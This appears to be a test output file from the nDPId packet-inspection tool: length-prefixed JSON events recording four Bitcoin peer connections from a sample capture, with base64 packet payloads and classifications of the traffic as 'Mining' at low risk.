00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"}
01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\/OztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNywaaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="}
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":215,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":215,"packets-processed":214,"total-skipped-flows":0,"total-l4-data-len":260266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1301328538215}
